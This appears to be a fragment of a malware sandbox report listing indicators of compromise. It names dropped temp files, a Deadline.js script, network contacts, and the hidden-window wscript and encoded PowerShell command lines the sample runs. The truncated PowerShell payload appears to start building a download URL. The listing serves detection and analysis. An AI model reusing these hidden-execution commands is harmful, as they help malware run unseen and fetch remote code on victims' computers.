Technical information
- %TEMP%\mz_etilqs_xxssah8y9ppjel8
- %TEMP%\mz_etilqs_ynnynwdvz0wozd5
- %TEMP%\mz_etilqs_iz90czonbkjp1sv
- %ALLUSERSPROFILE%\deadline.js
- %TEMP%\mz_etilqs_hunswrkwolo63gd
- %TEMP%\mz_etilqs_tomd3ycipwiue7g
- %TEMP%\mz_etilqs_cg10hwwitx9c3jq
- '35.##1.9.150':443
- DNS ASK fe########alog-cdn.prod.mozaws.net
- '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\Deadline.js" renewal SubstantiatedFallers
- '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\Deadline.js" renewal SubstantiatedFallers' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encodedcommand "JABIAHkAcABlAHIAcAB5AHIAZQB4AGkAYQBLAGkAbABvAGIAeQB0AGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGMAZwBCAGwAQQBIAE0AQQBZAHcAQgB5AEEARwBrAEEA...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encodedcommand "JABIAHkAcABlAHIAcAB5AHIAZQB4AGkAYQBLAGkAbABvAGIAeQB0AGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGMAZwBCAGwAQQBIAE0AQQBZAHcAQgB5AEEARwBrAEEA...